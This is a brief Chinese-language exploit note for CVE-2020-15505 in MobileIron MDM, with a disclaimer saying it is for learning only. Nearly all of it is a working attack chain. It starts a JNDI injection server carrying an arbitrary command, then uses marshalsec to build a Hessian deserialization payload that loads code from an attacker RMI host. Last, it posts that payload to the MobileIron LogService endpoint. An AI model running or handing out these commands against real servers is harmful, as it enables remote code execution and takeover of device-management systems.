請遵守網絡安全法!!!本文僅供學習交流使用!用於任何非授權滲透、非法目的攻擊、從事非法活動均與筆者無關!讀者自行承擔其惡果!
EXP
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A 0.0.0.0 -C "<Command>"
java -cp ./marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Hessian SpringAbstractBeanFactoryPointcutAdvisor rmi://<server-ip>:1099/<codebase> > exp
python hessian.py -p exp -u 'https://mobileiron-mdm-instance/mifs/.;/services/LogService'
來源
https://github.com/iamnoooob/CVE-Reverse/tree/master/CVE-2020-15505